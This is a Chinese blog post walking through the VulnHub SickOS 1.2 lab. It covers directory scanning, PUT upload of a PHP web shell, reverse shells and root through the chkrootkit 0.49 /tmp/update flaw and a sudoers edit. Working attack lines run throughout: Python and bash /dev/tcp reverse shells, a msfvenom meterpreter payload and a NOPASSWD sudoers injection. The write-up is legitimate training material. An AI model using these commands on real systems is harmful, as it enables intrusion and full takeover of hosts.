vulnhub渗透日记08:sickos1.2

已于 2023-07-21 19:58:58 修改
阅读量55 收藏
点赞数
分类专栏: Vulnhub靶机渗透日记 文章标签: web安全 linux
于 2023-07-20 11:45:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/131826795
版权
本文描述了一次在SickOS12靶机上的渗透测试过程,包括通过信息收集找到/test/目录,利用文件上传功能写入PHP后门,尝试反弹shell并最终通过修改chkrootkit的update文件进行提权,最后通过给予www-datasudo权限获得root权限。
摘要由CSDN通过智能技术生成

前言

⏰时间:2023.7.20
🗺️靶机地址:https://www.vulnhub.com/entry/sickos-12,144/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

在这里插入图片描述在这里插入图片描述在这里插入图片描述看看80端口
在这里插入图片描述把图片down下来strings分析了下,也没啥
dirb扫目录扫到/test/
在这里插入图片描述

文件上传

有文件读取,试试看能不能文件上传
改为put可以成功
在这里插入图片描述试试写入一句话
在这里插入图片描述在这里插入图片描述看有没有python
在这里插入图片描述

反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.153",7878));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

但是反弹不了,可能有防火墙限制
用msf的反弹shell,端口443试试

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.58.153 LPORT=443 -f raw > shell.php

上传shell.php

curl -v -H 'Expect:' -T shell.php "http://192.168.58.154/test/"
-v:显示详细的输出信息,包括请求和响应的头部信息。
-H 'Expect:':在请求头中添加一个Expect标头字段,值为空,避免请求头出现Expect: 100-continue ,从而引发不必要的错误
-T shell.php:将本地的shell.php文件作为请求主体发送到服务器。
"http://192.168.247.142/test/" : 指定上传文件的目标url路径

不加 -H ‘Expect:’,失败,并不是所有的 Server 都会正确响应100-continue,反而会返回417 Expectation Failed
在这里插入图片描述加-H ‘Expect:’,成功
在这里插入图片描述msf配置监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.58.153
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run

点击shell.php上线
在这里插入图片描述在这里插入图片描述python -c ‘import pty;pty.spawn(“/bin/bash”)’ 拿到稳定shell
在这里插入图片描述

寻找提权点

上传linpeas.sh扫描
存在内核提权
在这里插入图片描述在这里插入图片描述在这里插入图片描述计划任务是root运行的
在这里插入图片描述sudo用户
在这里插入图片描述搜一下计划任务

find / -name cron* 2>/dev/null

在这里插入图片描述
在这里插入图片描述在/etc/cron.hourly里发现chkrootkit, 是个监测rootkit木马的工具
在这里插入图片描述

chkrootkit提权

同样搜一下相关文件,看下版本是0.49
在这里插入图片描述搜索利用exp得到提示

- Put an executable file named 'update' with non-root owner in /tmp 
(not mounted noexec, obviously)
# 在/tmp中放置一个名为“update”的非root所有者的可执行文件
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
# 文件/tmp/update将以root用户身份执行,因此,如果文件中放置了恶意内容,则可以有效地root您的机器。
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
#如果攻击者知道您定期运行chkrootkit (比如cron.daily),并且对/tmp (没有挂载noexec) 有写权限,那么他很容易利用这一点。

echo'#!/bin/bash\nbash -i >& /dev/tcp/192.168.247.129/443 0>&1\n' > /tmp/update
chmod 777 /tmp/update
nc -nlvp 443

在这里插入图片描述查看newRule文件,防火墙只允许22,80,8080,443通过
在这里插入图片描述

sudo提权

rm -f update #删除之前的update
#给www-data加入sudo权限:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
ls -la /etc/sudoers  #等一会儿查看
sudo su          #成功获得root权限

在这里插入图片描述

_WHOAM1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 405
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
Vulnhub靶机系列:SickOs: 1.2
汗的博客
04-20 501
这次的靶机是Vulnhub靶机:SickOs: 1.1 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/sickos-12,144/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
Vulnhub 靶机渗透:SICKOS: 1.2
Mysmycbx的博客
06-07 1085
使用curl -X OPTIONS查看网站能够使用哪些请求方式,然后使用PUT进行上传恶意文件,例如一句话木马,反弹shell等。反弹shell时,尝试多个shell,bash,pyhton等。定时任务不止一个路径,/etc/crontab, 还有/etc/cron* ,包含/etc/cron.d,/etc/cron.daily等。定时任务里发现应用,一定要搜相关漏洞,搜到后综合多个poc进行利用。
Vulnhub靶机:SickOs1.2
qq_48904485的博客
03-21 747
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
vulnhub靶场渗透SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 1935
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
vulnhub渗透日记02:sickos1.1
ericalezl的博客
07-14 93
查看/etc/passwd,sickos用户是/bin/bash,可以试试。访问路径/wolfcms/public/rev.php,收到shell。/wolfcms/config.php发现数据库账号密码。查看updating.txt,发现版本信息 0.8.2。python开启交互式shell。msfconsole 开启监听。nmap针对开放端口进行探测。sickos是sudo组用户。admin:admin登录。搜索发现存在文件上传漏洞。whatweb看下指纹。masscan扫端口。3128需要代理访问。
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 1001
记一次Vulnhub-SickOs1.2渗透过程
【甄选靶场】Vulnhub百个项目渗透——项目十三:SickOs 1.2(防火墙绕过,计划任务写入)
人间体佐菲的博客
09-15 760
web安全,网络安全渗透测试,信息安全,网络空间安全
靶机渗透SickOs1.2(非常详细,适合新手渗透
君莫hacker的博客
09-08 7126
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
软设之网络安全控制
2301_81968528的博客
08-08 378
漏洞检测和安全风险评估技术,可预知主体受攻击的可能性和具体指证将要发生的行为和产生的后果。网络漏洞扫描技术主要包括网络模拟攻击,漏洞检测,报告服务进程,提取对象信息以及测评风险,提供安全建议和改进等功能,帮助用户控制可能发生的安全事件,最大可能消除安全隐患。IDS设备对于网络中的入侵行为往往是采用将入侵行为计入日志,并向网络管理员发出报警的方式来处理的,对于入侵行为并未主动的采取对应措施,响应方式单一。防火墙的作用是防止不希望的,未经授权的通信进出被保护的内部网络,通过边界控制强化内部网络的安全策略。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-14 1402
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全风险扫描原理及工具使用
qyq88888的专栏
08-08 973
通过一定的技术手段发现系统和软件存在的安全漏洞、弱口令。
网络安全(黑客)——自学2024
2401_84466325的博客
08-14 1016
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
国家网络安全战略如何保护个人信息安全
waitaikong_的博客
08-09 384
网络安全法》规定了个人信息的收集、使用、存储、传输等活动必须遵守法律法规,经过个人同意,并明确告知收集、使用的目的、方式和范围,同时应当保证个人信息的安全性,避免泄露、丢失或被篡改等情况发生。综上所述,国家网络安全战略的实施对个人信息安全产生了积极的影响,通过法律法规的完善、网络安全教育和培训的重视、关键基础设施的安全保护、国际交流与合作、数据分类分级保护以及数据安全风险管理等措施,有效地提高了个人信息的安全保护水平。通过对数据进行分类分级,可以采取不同的保护措施,确保不同级别的数据得到适当的保护。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值